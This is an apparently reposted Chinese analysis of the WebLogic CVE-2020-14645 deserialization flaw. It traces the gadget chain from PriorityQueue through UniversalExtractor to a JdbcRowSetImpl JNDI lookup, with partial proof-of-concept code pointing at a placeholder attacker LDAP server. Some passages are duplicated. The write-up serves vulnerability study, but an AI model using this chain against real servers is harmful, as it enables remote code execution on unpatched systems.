RELATEED CONSULTING
相关咨询
选择下列产品马上在线沟通
服务时间:8:30-17:00
你可能遇到了下面的问题
关闭右侧工具栏

新闻中心

这里有您想知道的互联网营销解决方案
WebLogiccoherenceUniversalExtractor反序列化的漏洞分析是怎样的

这篇文章将为大家详细讲解有关WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

琼海网站制作公司哪家好,找成都创新互联公司!从网页设计、网站建设、微信开发、APP开发、成都响应式网站建设等网站项目制作,到程序开发,运营维护。成都创新互联公司从2013年成立到现在10年的时间,我们拥有了丰富的建站经验和运维经验,来保证我们的工作的顺利进行。专注于网站建设就选成都创新互联公司

前言

Oracle七月发布的安全更新中,包含了一个Weblogic的反序列化RCE漏洞,编号CVE-2020-14645,CVS评分9.8。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

该漏洞是针对于CVE-2020-2883的补丁绕过,CVE-2020-2883补丁将MvelExtractor和ReflectionExtractor列入黑名单,因此需要另外寻找一个存在extract且方法内存在恶意操作的类,这里用到的类为com.tangosol.util.extractor.UniversalExtractor,存在于Coherence组件。

CVE-2020-2883

先来回顾一下CVE-2020-2883的两个poc调用链

//poc1
 javax.management.BadAttributeValueExpException.readObject()
   com.tangosol.internal.sleepycat.persist.evolve.Mutations.toString()
     java.util.concurrent.ConcurrentSkipListMap$SubMap.size()
     java.util.concurrent.ConcurrentSkipListMap$SubMap.isBeforeEnd()
       java.util.concurrent.ConcurrentSkipListMap.cpr()
         com.tangosol.util.comparator.ExtractorComparator.compare()
           com.tangosol.util.extractor.ChainedExtractor.extract()
           com.tangosol.util.extractor.ReflectionExtractor().extract()
             Method.invoke()
             //...
           com.tangosol.util.extractor.ReflectionExtractor().extract()
             Method.invoke()
               Runtime.exec()

//poc2
java.util.PriorityQueue.readObject()
  java.util.PriorityQueue.heapify()
  java.util.PriorityQueue.siftDown()
  java.util.PriorityQueue.siftDownUsingComparator()
  com.tangosol.util.extractor.AbstractExtractor.compare()
    com.tangosol.util.extractor.MultiExtractor.extract()
      com.tangosol.util.extractor.ChainedExtractor.extract()
        //...
        Method.invoke()
            //...
          Runtime.exec()

其本质上,都是通过ReflectionExtractor调用任意方法,从而实现调用Runtime对象的exec方法执行任意命令,但补丁现在已经将ReflectionExtractor列入黑名单,那么只能使用UniversalExtractor重新构造一条利用链,这里使用poc2的入口即CommonsCollections4链的入口进行构造。

CVE-2020-14645

为了方便一些纯萌新看懂,此处将会从0开始分析反序列化链(啰嗦模式警告),并且穿插一些poc构造时需要注意的点,先来看看调用栈。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

从头开始跟进分析整个利用链,先来看看PriorityQueue.readObject()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

第792会执行for循环,将s.readObject()方法赋给queue对象数组,跟进heapify()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

这里会取一半的queue数组分别执行siftDown(i, (E) queue[i]);,实质上PriorityQueue是一个最小堆,这里通过siftDown()方法进行排序实现堆化,那么跟进siftDown()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

这里有个对于comparator的判定,我们暂时不考虑comparator的值是什么,接下来会使用到,我们先跟进siftDownUsingComparator()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

重点关注comparator.compare()方法,那么我们先来看看comparator是怎么来的。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

是在PriorityQueue的构造函数中被赋值的,并且这里可以看到,queue对象数组也是在这里被初始化的。那么结合上述所分析的点,我们需要构造一个长度为2的queue对象数组,才能触发排序,进入siftDown()方法。同时还要选择一个comparator,这里选用ExtractorComparator。继续跟进ExtractorComparator.compare()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

这里将会调用this.m_extractor.extract()方法,让我们看看this.m_extractor是怎么来的。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

可以看到,this.m_extractor的值是与传入的extractor有关的。这里需要构造this.m_extractor为ChainedExtractor,才可以调用ChainedExtractor的extract()方法实现串接extract()调用。因此,首先需要构造这样一个PriorityQueue对象:

PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor));
//这里chainedExtractor为ChainedExtractor对象,后续会说明chainedExtractor对象的具体构造

继续跟进ChainedExtractor.extract()方法,可以发现会遍历aExtractor数组,并调用其extract()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

可以看到,this.m_extractor的值是与传入的extractor有关的。这里需要构造this.m_extractor为ChainedExtractor,才可以调用ChainedExtractor的extract()方法实现串接extract()调用。因此,首先需要构造这样一个PriorityQueue对象:

PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor));
//这里chainedExtractor为ChainedExtractor对象,后续会说明chainedExtractor对象的具体构造

继续跟进ChainedExtractor.extract()方法,可以发现会遍历aExtractor数组,并调用其extract()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

此处aExtractor数组是通过ChainedExtractor的父类AbstractCompositeExtractor的getExtractors()方法获取到父类的m_aExtractor属性值。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

所以,poc中需要这样构造m_aExtractor

Class clazz = ChainedExtractor.class.getSuperclass();
Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
m_aExtractor.setAccessible(true);

m_aExtractor具体的值需要怎么构造,需要我们继续往下分析。先回到我们所要利用到的UniversalExtractor,跟进其extract()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

此处由于m_cacheTarget使用了transient修饰,无法被反序列化,因此只能执行else部分,跟进extractComplex()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

这里看到最后有method.invoke()方法,oTarget和aoParam都是我们可控的,因此我们需要看看method的处理,跟进findMethod方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

可以看到第477行可以获取任意方法,但是要进入if语句,得先使fExactMatch为true,fStatic为false。可以看到fStatic是我们可控的,而fExactMatch默认为true,只要没进入for循环即可保持true不变,使cParams为空即aclzParam为空的Class数组即可,此处aclzParam从getClassArray()方法获取。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

显而易见,传入一个空的Object[]即可。回到extractComplex()方法,此时我们只要我们进入第192行的else语句中,即可调用任意类的任意方法。但此时还需要fProperty的值为false,跟进isPropertyExtractor()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

可惜m_fMethod依旧是使用transient修饰,溯源m_fMethod的赋值过程。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

可以看到,由于this对象的原因,getValueExtractorCanonicalName()方法始终返回的是null,那么跟进computeValuExtractorCanonicalName()方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

此处不难理解,如果aoParam不为null且数组长度大于0就会返回null,因此我们调用的方法必须是无参的(因为aoParam必须为null)。接着如果方法名sName不以 () 结尾,则会直接返回方法名。否则会判断方法名是否以 VALUE_EXTRACTOR_BEAN_ACCESSOR_PREFIXES数组中的前缀开头,是的话就会截取掉并返回。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

回到extractComplex方法中,在if条件里会对上述返回的方法名做首字母大写处理,然后拼接BEAN_ACCESSOR_PREFIXES数组中的前缀,判断clzTarget类中是否含有拼接后的方法。这时发现无论如何我们都只能调用任意类中get和is开头的方法,并且还要是无参的。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

整理下我们可以利用的思路:

  • 调用init()方法,对this.method进行赋值,从而使fProperty的值为false,从而进入else分支语句,实现调用任意类的任意方法。然而这个思路马上就被终结了,因为我们根本调用不了非get和is开头的方法!!!

  • 被transient修饰的m_cacheTarget在extractComplex方法中被赋值

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

在ExtractorComparator.compare()方法中,我们知道extract方法能被执行两次,因此在第二次执行时,能够在UniversalExtractor.extract方法中调用targetPrev.getMethod().invoke(oTarget, this.m_aoParam)方法。但是这种方法也是行不通的,因为getMethod()获取的就是图上红框的中的method,很显然method依旧受到限制,当我们调用非 get 和 is 开头的方法时,findMethod 会返回 null。

  • 只能走方法被限制的路线了,寻找所有类中以 get 和 is开头并且可利用的无参方法

get 和 is复现过Fastjson反序列化漏洞的小伙伴,应该清楚Fastjson的利用链寻找主要针对get和set方法,这时候就与我们的需求有重合处,不难想到JdbcRowSetImpl的JNDI注入,接下来一起回顾一下。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

其connect方法中调用了lookup方法,并且DataSourceName是可控的,因此存在JNDI注入漏洞,看看有哪些地方调用了connect方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

有三个方法调用了connect方法,分别为prepare、getDatabaseMetaData和setAutoCommit方法,逐一分析。

  • prepare()

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

一开始就调用了connect方法,继续回溯哪里调用了prepare方法。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

execute方法,应该是用于执行sql查询的

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

这个应该是用于获取参数元数据的方法,prepare()方法应该都是用于一些与sql语句有关的操作方法中。

  • getDatabaseMetaData()

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

  • setAutoCommit()

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

必须让this.conn为空,对象初始化时默认为null,因此直接进入else语句。其实this.conn就是connect方法,用于保持数据库连接状态。

回到connect方法,我们需要进入else语句才能执行lookup方法。有两个前提条件,this.conn为空,也就是执行connect方法时是第一次执行。第二个条件是必须设置DataSourceName的值,跟进去该参数,发现为父类BaseRowSet的private属性,可被反序列化。

那么,对于WebLogic这个反序列化利用链,我们只要利用getDatabaseMetaData()方法就行,接下来看看该怎么一步步构造poc。先从JdbcRowSetImpl的JNDI注入回溯构造:

JdbcRoSetImpl jdbcRowSet = (JdbcRowSetImpl)JdbcRowSetImpl.class.newInstance();
Method setDataSource_Method = jdbcRowSet.getClass().getMethod("setDataSourceName", String.class);
setDataSource_Method.invoke(jdbcRowSet,"ldap://xx.xx.xx.xx:1389/#Poc");//地址自行构造
//利用ysoserial的Reflections模块,由于需要获取queue[i]进行compare,因此需要对数组进行赋值
Object[] queueArray = (Object[])((Object[]) Reflections.getFieldValue(queue, "queue"));
queueArray[0] = jdbcRowSet;
queueArray[1] = jdbcRowSet;

接着构造 UniversalExtract 对象,用于调用 JdbcRowSetImpl 对象的方法

UniversalExtractor universalExtractor = new UniversalExtractor();
Object object = new Object[]{};
Reflections.setFieldValue(universalExtractor,"m_aoParam",object);
Reflections.setFieldValue(universalExtractor,"m_sName","DatabaseMetaData");
Reflections.setFieldValue(universalExtractor,"m_fMethod",false);

紧接着将 UniversalExtract 对象装载进文章开头构造的 chainedExtractor 对象中

ValueExtractor[] valueExtractor_list = new ValueExtractor[]{ universalExtractor };
field.set(chainedExtractor,valueExtractor_list2);//field为m_aExtractor

此处,还有一个小点需注意,一个在文章开头部分构造的 PriorityQueue 对象,需要构造一个临时 Extractor 对象,用于创建时的 comparator,此处以 ReflectionExtractor 为例。其次,PriorityQueue 对象需要执行两次 add 方法。

ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString",new Object[]{});
ChainedExtractor chainedExtractor = new ChainedExtractor(new ValueExtractor[]{reflectionExtractor});
PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor));
queue.add("1");
queue.add("1");

回到 PriorityQueue 对象的 readObject 方法

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

首先需要能进入 for 循环,for 循环就得有 size 的值,size 值默认为 0,private 属性,可以通过反射直接设置,但是不想通过反射怎么办,回溯赋值过程。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

在 offer 方法处获得赋值,而 offer 方法又是由 add 方法调用。(注意此处会执行 siftUp 方法,其中会触发 comparator 的 compare 方法,从而执行 extract 方法)。

WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的

不难理解,每 add 一次,size 加 1,根据上述 heapify 方法,只会从开头开始取一半的 queue 数组执行 siftDown 方法。所以 size 至少为 2,需要执行两次 add 方法,而不是 add(2) 一次。

至此,poc 的主体就构造完成,其余部分就不在此阐述了,当然构造方式有很多,此处为方便萌新,分析得比较啰嗦,poc 也比较杂乱,大家可以自行构造属于自己的 poc。

关于WebLogic coherence UniversalExtractor 反序列化的漏洞分析是怎样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。


分享标题:WebLogiccoherenceUniversalExtractor反序列化的漏洞分析是怎样的
浏览路径:http://lswzjz.com/article/pegggc.html